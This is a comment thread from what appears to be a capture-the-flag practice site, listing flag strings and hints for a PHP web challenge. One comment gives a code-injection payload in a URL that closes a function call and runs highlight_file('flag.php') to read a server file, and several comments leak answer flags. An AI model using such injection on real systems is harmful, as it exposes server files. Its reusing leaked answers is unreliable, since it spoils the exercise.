https://blog.csdn.net/guanrongl/article/details/142799641
flag{af99d77f1a8c71a69e7580a441f9c641};
flag{0c78799e8e21e8c1154621869960e3bf}
怎么我开启的环境和评论区好像不太一样,我里面是上传一个.jpg/.png后缀的文件,自动被当做python运行结果回显在页面注释里。很简单,但是获取到flag提交是错的
flag{b95f883f8d6d2a1096aad77516c046c3}
根据网页提示,hello作为参数提交 浏览器输入http://114.67.175.224:17573/?hello=hello,bp抓包 根据网友提示,对抓包url地址修改
flag{c6fcc6b437746842cc242259281f9fc4}
输入hello=file('flag.php')即可
http://114.67.175.224:18050/?hello=);highlight_file(%27flag.php%27);var_dump(
...
评论
小白帽来挖个漏洞 2小时前
举报
https://blog.csdn.net/guanrongl/article/details/142799641
czhf20120704 22天前
举报
flag{af99d77f1a8c71a69e7580a441f9c641};
翻斗花园牛爷爷 23天前
举报
flag{0c78799e8e21e8c1154621869960e3bf}
turriT0Psis 1月前
举报
怎么我开启的环境和评论区好像不太一样,我里面是上传一个.jpg/.png后缀的文件,自动被当做python运行结果回显在页面注释里。很简单,但是获取到flag提交是错的
fairytale0717 1月前
举报
flag{0c78799e8e21e8c1154621869960e3bf}
XmN<=GzR 2月前
举报
flag{b95f883f8d6d2a1096aad77516c046c3}
endual 3月前
举报
根据网页提示,hello作为参数提交 浏览器输入http://114.67.175.224:17573/?hello=hello,bp抓包 根据网友提示,对抓包url地址修改
Eureka0bugku 3月前
举报
flag{c6fcc6b437746842cc242259281f9fc4}
脚本小子admin 3月前
举报
输入hello=file('flag.php')即可
yangbing8555 3月前
举报
http://114.67.175.224:18050/?hello=);highlight_file(%27flag.php%27);var_dump(